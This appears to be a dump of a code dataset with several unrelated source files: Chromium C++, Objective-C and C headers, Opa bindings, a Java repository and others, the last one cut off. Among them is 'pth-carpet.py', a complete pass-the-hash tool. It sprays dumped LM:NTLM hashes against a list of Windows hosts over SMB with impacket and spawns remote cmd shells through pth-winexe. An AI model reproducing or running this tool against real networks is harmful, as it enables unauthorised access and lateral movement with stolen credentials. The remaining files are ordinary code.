max_stars_count
int64 301
224k
| text
stringlengths 6
1.05M
| token_count
int64 3
727k
|
---|---|---|
575 | <reponame>zealoussnow/chromium
// Copyright 2018 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/ui/app_list/arc/arc_fast_app_reinstall_starter.h"
#include "chrome/browser/profiles/profile.h"
#include "chrome/browser/ui/app_list/arc/arc_app_utils.h"
#include "components/arc/arc_prefs.h"
#include "components/arc/arc_util.h"
#include "components/prefs/pref_service.h"
namespace arc {
// TODO(rsgingerrs): This shares a lot of functionality with ArcPaiStarter.
// Should create a base class and put common code there.
ArcFastAppReinstallStarter::ArcFastAppReinstallStarter(
content::BrowserContext* context,
PrefService* pref_service)
: context_(context), pref_service_(pref_service) {
ArcAppListPrefs* prefs = ArcAppListPrefs::Get(context_);
// Prefs may not available in some unit tests.
if (!prefs)
return;
prefs->AddObserver(this);
MaybeStartFastAppReinstall();
}
ArcFastAppReinstallStarter::~ArcFastAppReinstallStarter() {
ArcAppListPrefs* prefs = ArcAppListPrefs::Get(context_);
if (!prefs)
return;
prefs->RemoveObserver(this);
}
// static
std::unique_ptr<ArcFastAppReinstallStarter>
ArcFastAppReinstallStarter::CreateIfNeeded(content::BrowserContext* context,
PrefService* pref_service) {
if (pref_service->GetBoolean(prefs::kArcFastAppReinstallStarted))
return nullptr;
return std::make_unique<ArcFastAppReinstallStarter>(context, pref_service);
}
void ArcFastAppReinstallStarter::OnAppsSelectionFinished() {
MaybeStartFastAppReinstall();
}
void ArcFastAppReinstallStarter::MaybeStartFastAppReinstall() {
if (started_) {
VLOG(2) << "Fast App Reinstall has already started.";
return;
}
ArcAppListPrefs* prefs = ArcAppListPrefs::Get(context_);
DCHECK(prefs);
std::unique_ptr<ArcAppListPrefs::AppInfo> app_info =
prefs->GetApp(kPlayStoreAppId);
if (!app_info || !app_info->ready) {
VLOG(2) << "Play Store is not ready. Will not start Fast App Reinstall.";
return;
}
const std::vector<std::string> selected_packages =
GetSelectedPackagesFromPrefs(context_);
if (selected_packages.size() <= 0) {
VLOG(2) << "No selected packages. Will not start Fast App Reinstall.";
return;
}
VLOG(2) << "Fast App Reinstall started...";
started_ = true;
StartFastAppReinstallFlow(selected_packages);
pref_service_->SetBoolean(prefs::kArcFastAppReinstallStarted, true);
}
void ArcFastAppReinstallStarter::OnAppRegistered(
const std::string& app_id,
const ArcAppListPrefs::AppInfo& app_info) {
OnAppStatesChanged(app_id, app_info);
}
void ArcFastAppReinstallStarter::OnAppStatesChanged(
const std::string& app_id,
const ArcAppListPrefs::AppInfo& app_info) {
if (app_id == kPlayStoreAppId && app_info.ready)
MaybeStartFastAppReinstall();
}
} // namespace arc
| 1,061 |
418 | //
// BFAPIRequestOrderInfo+BFValidation.h
// OpenShop
//
// Created by <NAME> on 21.01.16.
// Copyright © 2016 Business-Factory. All rights reserved.
//
#import "BFAPIRequestOrderInfo.h"
NS_ASSUME_NONNULL_BEGIN
/*
* `BFValidation` category offers methods for `BFAPIRequestOrderInfo` validation
*/
@interface BFAPIRequestOrderInfo (BFValidation)
/*
* Validates `BFAPIRequestOrderInfo`.
*/
- (BOOL)isValid;
/*
* Validates `BFAPIRequestOrderInfo` and offers completion handlers if
* part of the validation fails. At first is validated shipping and payment
* and then address.
*/
- (BOOL)isValidWithIncompleteShippingPaymentHandler:(void(^)(BFShippingAndPaymentItem))incompleteShippingPaymentHandler
incompleteAddressHandler:(void(^)(BFAddressItem))incompleteAddressHandler;
@end
NS_ASSUME_NONNULL_END | 275 |
643 | <reponame>Machiaweliczny/oppailang
/*
Copyright © 2011 MLstate
This file is part of Opa.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
##module bypervasives
##register add_int\bypervasives_add : int -> int -> int
long long int bypervasives_add(long long int i, long long int j)
{
return(i+j);
}
/*
long long int toto = 42;
register myconst : int
const
42;
register myrec : record toto
const
(toto){4 , 6}
*/
##register bsl_print_int : int -> void
void bsl_print_int(long long int i)
{
fprintf(stdout, "qml2llvm with cbsl (int) : %lld\n", i);
fflush(stdout);
}
/*
register +\add : int -> int -> int
args(i, j)
{
return(i+j);
}
*/
##register sub_int\bypervasives_sub : int -> int -> int
long long int bypervasives_sub(long long int i, long long int j)
{
return(i-j);
}
##endmodule
##register print_endline : string -> unit
void print_endline(char *s)
{
fprintf(stdout, "qml2llvm with cbsl (string) : %s\n", s);
fflush(stdout);
}
##register concat : string -> string -> string
char *concat(char *u, char *v)
{
int i, j;
char *s;
i = strlen(u);
j = strlen(v);
s = (char*)malloc((i+j+1)*sizeof(char));
strcpy(s, u);
strcpy(s+i, v);
s[i+j] = 0;
return(s);
}
| 782 |
3,459 | #ifndef AF80_H_
#define AF80_H_
#include "atari.h"
#include <stdio.h>
extern int AF80_palette[16];
int AF80_Initialise(int *argc, char *argv[]);
void AF80_Exit(void);
void AF80_InsertRightCartridge(void);
int AF80_ReadConfig(char *string, char *ptr);
void AF80_WriteConfig(FILE *fp);
int AF80_D5GetByte(UWORD addr, int no_side_effects);
void AF80_D5PutByte(UWORD addr, UBYTE byte);
int AF80_D6GetByte(UWORD addr, int no_side_effects);
void AF80_D6PutByte(UWORD addr, UBYTE byte);
UBYTE AF80_GetPixels(int scanline, int column, int *colour, int blink);
extern int AF80_enabled;
void AF80_Reset(void);
#endif /* AF80_H_ */
| 256 |
764 | {"symbol": "GBX","address": "0x12fCd6463E66974cF7bBC24FFC4d40d6bE458283","overview":{"en": ""},"email": "<EMAIL>","website": "https://www.globitexico.com/","state": "NORMAL","links": {"blog": "https://medium.com/@globitex","twitter": "https://twitter.com/globitex_","telegram": "https://t.me/globitex","github": ""}} | 129 |
964 | <reponame>Ilanad/kics
[
{
"queryName": "Azure Instance Using Basic Authentication",
"severity": "HIGH",
"line": 53,
"filename": "positive1.json"
},
{
"queryName": "Azure Instance Using Basic Authentication",
"severity": "HIGH",
"line": 40,
"filename": "positive2.json"
}
]
| 130 |
403 | <filename>snippets/camunda-openapi-client/camunda-openapi-client-spring/src/test/java/com/camunda/consulting/openapi/client/handler/HistoricDecisionRequirementsDefinitionApiTest.java
/*
* Camunda Platform REST API
* OpenApi Spec for Camunda Platform REST API.
*
* The version of the OpenAPI document: 7.16.0
*
*
* NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
* https://openapi-generator.tech
* Do not edit the class manually.
*/
package com.camunda.consulting.openapi.client.handler;
import com.camunda.consulting.openapi.client.model.ExceptionDto;
import com.camunda.consulting.openapi.client.model.HistoricDecisionInstanceStatisticsDto;
import org.junit.Test;
import org.junit.Ignore;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
/**
* API tests for HistoricDecisionRequirementsDefinitionApi
*/
@Ignore
public class HistoricDecisionRequirementsDefinitionApiTest {
private final HistoricDecisionRequirementsDefinitionApi api = new HistoricDecisionRequirementsDefinitionApi();
/**
* Get DRD Statistics
*
* Retrieves evaluation statistics of a given decision requirements definition.
*
* @throws ApiException
* if the Api call fails
*/
@Test
public void getDecisionStatisticsTest() {
String id = null;
String decisionInstanceId = null;
List<HistoricDecisionInstanceStatisticsDto> response = api.getDecisionStatistics(id, decisionInstanceId);
// TODO: test validations
}
}
| 526 |
17,085 | <reponame>zmxdream/Paddle
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle.fluid.optimizer import Optimizer
from paddle.fluid.regularizer import L1DecayRegularizer
from paddle.fluid.regularizer import L2DecayRegularizer
from paddle.fluid import core
from paddle.fluid import framework
from paddle.fluid.framework import program_guard
from paddle.fluid import unique_name
from paddle.fluid import layers
from paddle.fluid.layer_helper import LayerHelper
import warnings
from paddle import _C_ops
__all__ = ['Momentum']
class Momentum(Optimizer):
r"""
Simple Momentum optimizer with velocity state
This optimizer has a flag for Nestrov Momentum.
The update equations are as follows:
.. math::
& velocity = mu * velocity + gradient
& if (use\_nesterov):
&\quad param = param - (gradient + mu * velocity) * learning\_rate
& else:
&\quad param = param - learning\_rate * velocity
Parameters:
learning_rate (float|Variable): The learning rate used to update parameters. \
Can be a float value or a Variable with one float value as data element.
momentum (float): Momentum factor
parameter_list (Iterable, optional): Iterable of ``Variable`` names to update to minimize ``loss``. \
This parameter is required in dygraph mode. \
The default value is None in static mode, at this time all parameters will be updated.
use_nesterov (bool, optional): Enables Nesterov momentum, default is false.
regularization (WeightDecayRegularizer, optional): The strategy of regularization. There are two method: \
:ref:`api_fluid_regularizer_L1Decay` , :ref:`api_fluid_regularizer_L2Decay` . If a parameter has set \
regularizer using :ref:`api_fluid_ParamAttr` already, the regularization setting here in optimizer will be \
ignored for this parameter. Otherwise, the regularization setting here in optimizer will take effect. \
Default None, meaning there is no regularization.
grad_clip (GradientClipBase, optional): Gradient cliping strategy, it's an instance of
some derived class of ``GradientClipBase`` . There are three cliping strategies
( :ref:`api_fluid_clip_GradientClipByGlobalNorm` , :ref:`api_fluid_clip_GradientClipByNorm` ,
:ref:`api_fluid_clip_GradientClipByValue` ). Default None, meaning there is no gradient clipping.
multi_precision (bool, optional): Whether to use multi-precision during weight updating. Default is false.
rescale_grad (float, optional): Multiply the gradient with `rescale_grad` before updating. \
Often choose to be ``1.0/batch_size``.
name (str, optional): This parameter is used by developers to print debugging information. \
For details, please refer to :ref:`api_guide_Name`. Default is None.
Examples:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
paddle.enable_static()
place = fluid.CPUPlace()
main = fluid.Program()
with fluid.program_guard(main):
x = paddle.static.data(name='x', shape=[1, 13], dtype='float32')
y = paddle.static.data(name='y', shape=[1], dtype='float32')
linear = paddle.nn.Linear(13, 1)
y_predict = linear(x)
cost = paddle.nn.functional.square_error_cost(input=y_predict, label=y)
avg_cost = paddle.mean(cost)
moment_optimizer = fluid.contrib.optimizer.Momentum(learning_rate=0.001, momentum=0.9)
moment_optimizer.minimize(avg_cost)
fetch_list = [avg_cost]
train_reader = paddle.batch(
paddle.dataset.uci_housing.train(), batch_size=1)
feeder = fluid.DataFeeder(place=place, feed_list=[x, y])
exe = fluid.Executor(place)
exe.run(paddle.static.default_startup_program())
for data in train_reader():
exe.run(main, feed=feeder.feed(data), fetch_list=fetch_list)
"""
_velocity_acc_str = "velocity"
def __init__(self,
learning_rate,
momentum,
parameter_list=None,
use_nesterov=False,
regularization=None,
grad_clip=None,
multi_precision=False,
rescale_grad=1.0,
name=None):
assert learning_rate is not None
assert momentum is not None
predicate = lambda regular: isinstance(regular, L2DecayRegularizer)
py_regular = None if predicate(regularization) else regularization
super(Momentum, self).__init__(
learning_rate=learning_rate,
parameter_list=parameter_list,
regularization=py_regular,
grad_clip=grad_clip,
name=name)
self.type = "momentum"
self._momentum = momentum
self._use_nesterov = bool(use_nesterov)
self._regularization_method = ""
self._regularization_coeff = 0
if (isinstance(regularization, L2DecayRegularizer)):
self._regularization_method = "l2_decay"
self._regularization_coeff = regularization._regularization_coeff
self._multi_precision = multi_precision
self._rescale_grad = rescale_grad
self._master_weights = {}
def _create_master_weight(self, param):
assert isinstance(self.helper, LayerHelper)
var_name = param.name + "_fp32_master"
var_name = unique_name.generate(var_name)
var = layers.create_global_var(
name=var_name,
shape=param.shape,
value=0,
dtype='float32',
persistable=True)
block = self.helper.startup_program.global_block()
block.append_op(
type="cast",
inputs={"X": [param]},
outputs={"Out": [var]},
attrs={
"in_dtype": param.dtype,
"out_dtype": core.VarDesc.VarType.FP32
})
self._master_weights[param.name] = var
return var
def _get_accumulator(self, name, param):
"""Utility function to fetch an accumulator for a parameter
Args:
name: name of the accumulator
param: parameter variable for which accumulator is to be fetched
Returns:
accumulator variable for the parameter
"""
if self._name is not None:
name = self._name + "_" + name
find_master = self._multi_precision and param.dtype == core.VarDesc.VarType.FP16
target_param = self._master_weights[
param.name] if find_master else param
target_name = target_param.name
if (name not in self._accumulators or
target_name not in self._accumulators[name]):
raise Exception("Accumulator {} does not exist for parameter {}".
format(name, target_name))
return self._accumulators[name][target_name]
def _create_accumulators(self, block, parameters):
assert isinstance(block, framework.Block)
for p in parameters:
if self._multi_precision and p.dtype == core.VarDesc.VarType.FP16:
master_p = self._create_master_weight(p)
self._add_accumulator(self._velocity_acc_str, master_p)
continue
if p.dtype == core.VarDesc.VarType.FP16 and not self._multi_precision:
warnings.warn(
"Accumulating with FP16 in optimizer can lead to poor accuracy or slow convergence."
"Consider using multi_precision=True option of the Momentum optimizer."
)
self._add_accumulator(self._velocity_acc_str, p)
def _append_optimize_op(self, block, param_and_grad):
assert isinstance(block, framework.Block)
velocity_acc = self._get_accumulator(self._velocity_acc_str,
param_and_grad[0])
lr = self._create_param_lr(param_and_grad)
find_master = self._multi_precision and param_and_grad[
0].dtype == core.VarDesc.VarType.FP16
master_weight = (self._master_weights[param_and_grad[0].name]
if find_master else None)
if framework.in_dygraph_mode():
_, _, _ = _C_ops.momentum(
param_and_grad[0], param_and_grad[1], velocity_acc, lr,
master_weight, param_and_grad[0], velocity_acc, master_weight,
'mu', self._momentum, 'use_nesterov', self._use_nesterov,
'regularization_method', self._regularization_method,
'regularization_coeff', self._regularization_coeff,
'multi_precision', find_master)
return None
attrs = {
"mu": self._momentum,
"use_nesterov": self._use_nesterov,
"regularization_method": self._regularization_method,
"regularization_coeff": self._regularization_coeff,
"multi_precision": find_master,
"rescale_grad": self._rescale_grad
}
inputs = {
"Param": [param_and_grad[0]],
"Grad": [param_and_grad[1]],
"Velocity": [velocity_acc],
"LearningRate": [lr]
}
outputs = {
"ParamOut": [param_and_grad[0]],
"VelocityOut": [velocity_acc]
}
if find_master:
inputs["MasterParam"] = master_weight
outputs["MasterParamOut"] = master_weight
# create the momentum optimize op
momentum_op = block.append_op(
type=self.type,
inputs=inputs,
outputs=outputs,
attrs=attrs,
stop_gradient=True)
return momentum_op
| 4,650 |
2,494 | # Generated via `gentags.py src/tag.in`.
# Do not edit; edit src/tag.in instead.
# clang-format off
TagNames = [
"HTML",
"HEAD",
"TITLE",
"BASE",
"LINK",
"META",
"STYLE",
"SCRIPT",
"NOSCRIPT",
"TEMPLATE",
"BODY",
"ARTICLE",
"SECTION",
"NAV",
"ASIDE",
"H1",
"H2",
"H3",
"H4",
"H5",
"H6",
"HGROUP",
"HEADER",
"FOOTER",
"ADDRESS",
"P",
"HR",
"PRE",
"BLOCKQUOTE",
"OL",
"UL",
"LI",
"DL",
"DT",
"DD",
"FIGURE",
"FIGCAPTION",
"MAIN",
"DIV",
"A",
"EM",
"STRONG",
"SMALL",
"S",
"CITE",
"Q",
"DFN",
"ABBR",
"DATA",
"TIME",
"CODE",
"VAR",
"SAMP",
"KBD",
"SUB",
"SUP",
"I",
"B",
"U",
"MARK",
"RUBY",
"RT",
"RP",
"BDI",
"BDO",
"SPAN",
"BR",
"WBR",
"INS",
"DEL",
"IMAGE",
"IMG",
"IFRAME",
"EMBED",
"OBJECT",
"PARAM",
"VIDEO",
"AUDIO",
"SOURCE",
"TRACK",
"CANVAS",
"MAP",
"AREA",
"MATH",
"MI",
"MO",
"MN",
"MS",
"MTEXT",
"MGLYPH",
"MALIGNMARK",
"ANNOTATION_XML",
"SVG",
"FOREIGNOBJECT",
"DESC",
"TABLE",
"CAPTION",
"COLGROUP",
"COL",
"TBODY",
"THEAD",
"TFOOT",
"TR",
"TD",
"TH",
"FORM",
"FIELDSET",
"LEGEND",
"LABEL",
"INPUT",
"BUTTON",
"SELECT",
"DATALIST",
"OPTGROUP",
"OPTION",
"TEXTAREA",
"KEYGEN",
"OUTPUT",
"PROGRESS",
"METER",
"DETAILS",
"SUMMARY",
"MENU",
"MENUITEM",
"APPLET",
"ACRONYM",
"BGSOUND",
"DIR",
"FRAME",
"FRAMESET",
"NOFRAMES",
"ISINDEX",
"LISTING",
"XMP",
"NEXTID",
"NOEMBED",
"PLAINTEXT",
"RB",
"STRIKE",
"BASEFONT",
"BIG",
"BLINK",
"CENTER",
"FONT",
"MARQUEE",
"MULTICOL",
"NOBR",
"SPACER",
"TT",
"RTC",
]
| 959 |
571 | <filename>src/de/gurkenlabs/litiengine/environment/tilemap/ITileOffset.java<gh_stars>100-1000
package de.gurkenlabs.litiengine.environment.tilemap;
public interface ITileOffset {
public int getX();
public int getY();
}
| 89 |
1,139 | <filename>hard-gists/3018bf3643f80798bde75c17571a38a9/snippet.py
#!/usr/bin/python
#
# Simple script intended to perform Carpet Bombing against list
# of provided machines using list of provided LSA Hashes (LM:NTLM).
# The basic idea with Pass-The-Hash attack is to get One hash and use it
# against One machine. There is a problem with this approach of not having information,
# onto what machine we could have applied the hash.
# To combat this issue - the below script was born.
#
# Requirements:
# This script requires 'pth-winexe' utility (or winexe renamed to pth-winexe') be present
# within system during script's invocation. In case this utility will not be present -
# no further check upon ability to run commands from PTH attack - will be displayed.
# Also, modules such as:
# - impacket
#
# Notice:
# This script is capable of verifying exploitability of only Windows boxes. In case
# of other type of boxes (running Samba) pth-winexe will not yield satisfying results.
#
# Usage:
# $ ./pth-carpet.py machines.txt pwdump
#
# coded by:
# <NAME>., 2016 / mgeeky
# version 0.2
#
# Should be working on Windows boxes as well as on Linux ones.
#
from __future__ import print_function
import os
import sys
import argparse
import signal
import logging
import threading
import subprocess
import multiprocessing
from termcolor import colored
from functools import partial
from multiprocessing.managers import BaseManager
from impacket.dcerpc.v5 import transport
WORKERS = multiprocessing.cpu_count() * 4
TIMEOUT = 10
OPTIONS = None
LOCK = multiprocessing.Lock()
def info(txt):
with LOCK:
print (txt)
def success(txt):
info(colored('[+] '+txt, 'green', attrs=['bold']))
def warning(txt):
info(colored('[*] '+txt, 'yellow'))
def verbose(txt):
if OPTIONS.v:
info(colored('[?] '+txt, 'white'))
def err(txt):
info(colored('[!] '+txt, 'red'))
class Command(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
self.output = ''
self.error = ''
verbose( '\tCalling: "%s"' % cmd)
def get_output(self):
return self.output, self.error
def run(self, stdin, timeout):
def target():
self.process = subprocess.Popen(self.cmd, shell=True, \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
self.output, self.error = self.process.communicate(stdin)
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
return False
else:
return True
def init_worker():
# http://stackoverflow.com/a/6191991
signal.signal(signal.SIGINT, signal.SIG_IGN)
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
def check_rce(host, username, hash, port):
verbose('\tChecking whether provided hash can be used to PTH remote code execution')
if cmd_exists('pth-winexe'):
userswitch = '%s%%%s' % (username, hash)
c = Command('pth-winexe -U %s //%s cmd' % (userswitch, host))
if c.run('exit\n', TIMEOUT):
pass
else:
verbose('\tPTH-Winexe had to be terminated.')
out, error = c.get_output()
if 'Microsoft' in out and '(C) Copyright' in out and '[Version' in out:
return True
else:
errorm = error[error.find('NT_STATUS'):].strip()
if not errorm.startswith('NT_STATUS'):
if 'NT_STATUS' in error:
errorm = error
else:
errorm = 'Unknown error'
if OPTIONS.v:
err('\tCould not spawn shell using PTH: ' + errorm)
else:
warning('\tPlease check above hash whether using it you can access writeable $IPC share to execute cmd.')
return False
def login(host, username, hash, port):
stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % host
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(port)
lmhash, nthash = hash.split(':')
rpctransport.set_credentials(username, '', '', lmhash, nthash, None)
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
return check_rce(host, username, hash, port)
except Exception, e:
raise e
def correct_hash(hash):
lmhash, nthash = hash.split(':')
if '*' in lmhash:
lmhash = '0' * 32
if '*' in nthash:
nthash = '0' * 32
return lmhash + ':' + nthash
def worker(stopevent, pwdump, machine):
for user, hash in pwdump.items():
if stopevent.is_set():
break
hash = correct_hash(hash)
try:
if login(machine, user, hash, OPTIONS.port):
success('Pass-The-Hash with shell spawned: %s@%s (%s)' % (user, machine, hash))
else:
if OPTIONS.v:
warning('Connected using PTH but could\'nt spawn shell: %s@%s (%s)' % (user, machine, hash))
except Exception, e:
verbose('Hash was not accepted: %s@%s (%s)\n\t%s' % (user, machine, hash, str(e)))
def main():
global OPTIONS
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\t<NAME>., 2016\n', 'white', attrs=['bold']))
parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool')
parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts')
parser.add_argument('hashes', nargs='?', help='Specifies input file containing list of dumped hashes in pwdump format')
parser.add_argument('-v', action='store_true', help='Verbose mode')
parser.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar='smb port', help='Destination port used to connect into SMB Server')
if len(sys.argv) < 3:
parser.print_help()
sys.exit(1)
OPTIONS = parser.parse_args()
machines = [x.strip() for x in open(OPTIONS.rhosts).readlines() ]
rawpwdump = [x.strip() for x in open(OPTIONS.hashes).readlines() ]
pwdump = {}
for p in rawpwdump:
try:
user = p.split(':')[0]
hash = p.split(':')[2] + ':' + p.split(':')[3]
except:
err('Supplied hashes file does not conform PWDUMP format!')
err('\tIt must be like this: <user>:<id>:<lmhash>:<nthash>:...')
sys.exit(1)
pwdump[user] = hash
warning('Testing %d hashes against %d machines. Resulting in total in %d PTH attempts\n' \
% (len(pwdump), len(machines), len(pwdump) * len(machines)))
stopevent = multiprocessing.Manager().Event()
try:
pool = multiprocessing.Pool(WORKERS, init_worker)
func = partial(worker, stopevent, pwdump)
pool.map_async(func, machines)
pool.close()
pool.join()
except KeyboardInterrupt:
pool.terminate()
pool.join()
success('\nUser interrupted the script.')
if __name__ == '__main__':
main() | 3,066 |
394 | package net.earthcomputer.multiconnect.protocols.generic;
@FunctionalInterface
public interface IRegistryUpdateListener<T> {
void onUpdate(T thing, boolean inPlace);
default boolean callOnRestore() {
return false;
}
}
| 80 |
1,144 | <filename>backend/de.metas.vertical.healthcare.alberta/src/main/java/de/metas/vertical/healthcare/alberta/bpartner/user/AlbertaUserRepository.java<gh_stars>1000+
/*
* #%L
* de.metas.vertical.healthcare.alberta
* %%
* Copyright (C) 2021 metas GmbH
* %%
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as
* published by the Free Software Foundation, either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License along with this program. If not, see
* <http://www.gnu.org/licenses/gpl-2.0.html>.
* #L%
*/
package de.metas.vertical.healthcare.alberta.bpartner.user;
import de.metas.user.UserId;
import de.metas.util.Services;
import de.metas.vertical.healthcare.alberta.model.I_AD_User_Alberta;
import lombok.NonNull;
import org.adempiere.ad.dao.IQueryBL;
import org.adempiere.model.InterfaceWrapperHelper;
import org.compiere.util.TimeUtil;
import org.springframework.stereotype.Repository;
import java.util.Optional;
@Repository
public class AlbertaUserRepository
{
final IQueryBL queryBL = Services.get(IQueryBL.class);
@NonNull
public AlbertaUser save(final @NonNull AlbertaUser user)
{
final I_AD_User_Alberta record = InterfaceWrapperHelper.loadOrNew(user.getUserAlbertaId(), I_AD_User_Alberta.class);
record.setAD_User_ID(user.getUserId().getRepoId());
record.setTimestamp(TimeUtil.asTimestamp(user.getTimestamp()));
record.setTitle(user.getTitle() != null ? user.getTitle().getCode() : null);
record.setGender(user.getGender() != null ? user.getGender().getCode() : null);
InterfaceWrapperHelper.save(record);
return toAlbertaUser(record);
}
@NonNull
public Optional<AlbertaUser> getByUserId(final @NonNull UserId userId)
{
return queryBL.createQueryBuilder(I_AD_User_Alberta.class)
.addOnlyActiveRecordsFilter()
.addEqualsFilter(I_AD_User_Alberta.COLUMNNAME_AD_User_ID, userId)
.create()
.firstOnlyOptional(I_AD_User_Alberta.class)
.map(this::toAlbertaUser);
}
@NonNull
public AlbertaUser toAlbertaUser(final @NonNull I_AD_User_Alberta record)
{
final UserAlbertaId userAlbertaId = UserAlbertaId.ofRepoId(record.getAD_User_Alberta_ID());
final UserId userId = UserId.ofRepoId(record.getAD_User_ID());
return AlbertaUser.builder()
.userAlbertaId(userAlbertaId)
.userId(userId)
.title(TitleType.ofCodeNullable(record.getTitle()))
.gender(GenderType.ofCodeNullable(record.getGender()))
.timestamp(TimeUtil.asInstant(record.getTimestamp()))
.build();
}
}
| 1,015 |
937 | <reponame>HaoZhang95/PythonAndMachineLearning
"""
shell命令解析器
1- 作用:对用户输入的命令进行解析,中间翻译者 内核 <-> shell命令解析器<-> 终端
01Linux篇章day01,day02先略过,课程内容看pdf文件
"""
| 161 |
389 | <reponame>tcmoore32/sheer-madness
/*
* Copyright 2014 Guidewire Software, Inc.
*/
package gw.internal.gosu.compiler;
import java.lang.reflect.Method;
/**
*/
public class PropertyIdentifierTest extends ByteCodeTestBase
{
public void testInstanceVarProperty() throws Exception
{
Object obj = newPropertyIdentifierClass();
Method getM2 = obj.getClass().getMethod( "getM2" );
Object ret = getM2.invoke( obj );
assertNull( ret );
Method setM2 = obj.getClass().getMethod( "setM2", String.class );
setM2.invoke( obj, "goober" );
ret = getM2.invoke( obj );
assertSame( "goober", ret );
}
public void testStaticVarProperty() throws Exception
{
Object obj = newPropertyIdentifierClass();
Method getM3 = obj.getClass().getMethod( "getM3" );
Object ret = getM3.invoke( null );
assertNull( ret );
Method setM3 = obj.getClass().getMethod( "setM3", String.class );
setM3.invoke( null, "goober" );
ret = getM3.invoke( null );
assertSame( "goober", ret );
}
public void testReadOnlyInstanceProperty() throws Exception
{
Object obj = newPropertyIdentifierClass();
Method getM4 = obj.getClass().getMethod( "getM4" );
Object ret = getM4.invoke( obj );
assertEquals( (Integer) 4, (Integer)ret );
}
public void testInstanceProperty() throws Exception
{
Object obj = newPropertyIdentifierClass();
Method getM5 = obj.getClass().getMethod( "getM5" );
Object ret = getM5.invoke( obj );
assertZero( (Integer)ret );
Method setM5 = obj.getClass().getMethod( "setM5", int.class );
setM5.invoke( obj, 888 );
ret = getM5.invoke( obj );
assertEquals( (Integer) 888, (Integer)ret );
}
public void testStaticProperty() throws Exception
{
Object obj = newPropertyIdentifierClass();
Method getM6 = obj.getClass().getMethod( "getM6" );
Object ret = getM6.invoke( null );
assertZero( (Integer)ret );
Method setM6 = obj.getClass().getMethod( "setM6", int.class );
setM6.invoke( null, 888 );
ret = getM6.invoke( null );
assertEquals( (Integer) 888, (Integer)ret );
}
public void testAccessInstanceProperty() throws Exception
{
Object obj = newPropertyIdentifierClass();
Method getM5 = obj.getClass().getMethod( "accessM5" );
Object ret = getM5.invoke( obj );
assertZero( (Integer)ret );
Method setM5 = obj.getClass().getMethod( "changeM5", int.class );
setM5.invoke( obj, 888 );
ret = getM5.invoke( obj );
assertEquals( (Integer) 888, (Integer)ret );
}
public void testAccessStaticProperty() throws Exception
{
Object obj = newPropertyIdentifierClass();
Method getM5 = obj.getClass().getMethod( "accessM5" );
Object ret = getM5.invoke( obj );
assertZero( (Integer)ret );
Method setM5 = obj.getClass().getMethod( "changeM5", int.class );
setM5.invoke( obj, 888 );
ret = getM5.invoke( obj );
assertEquals( (Integer) 888, (Integer)ret );
}
private Object newPropertyIdentifierClass() throws ClassNotFoundException, InstantiationException, IllegalAccessException
{
final String classPropertyIdentifier = "gw.internal.gosu.compiler.sample.expression.PropertyIdentifier";
Class<?> javaClass = GosuClassLoader.instance().findClass( classPropertyIdentifier );
assertNotNull( javaClass );
assertEquals( classPropertyIdentifier, javaClass.getName() );
assertNotNull( javaClass.newInstance() );
return javaClass.newInstance();
}
} | 1,215 |
392 | <reponame>mouthwater/rgb
/*
* Index out of bounds exception.
*/
#ifndef LANG__EXCEPTIONS__EX_INDEX_OUT_OF_BOUNDS_HH
#define LANG__EXCEPTIONS__EX_INDEX_OUT_OF_BOUNDS_HH
#include "lang/exceptions/exception.hh"
namespace lang {
namespace exceptions {
/*
* Index out of bounds exception.
*/
class ex_index_out_of_bounds : public exception {
public:
/*
* Constructor.
*/
explicit ex_index_out_of_bounds(
const char*, /* message (use default if NULL) */
unsigned long /* index */
);
/*
* Copy constructor.
*/
ex_index_out_of_bounds(const ex_index_out_of_bounds&);
/*
* Destructor.
*/
virtual ~ex_index_out_of_bounds();
/*
* Clone the exception.
*/
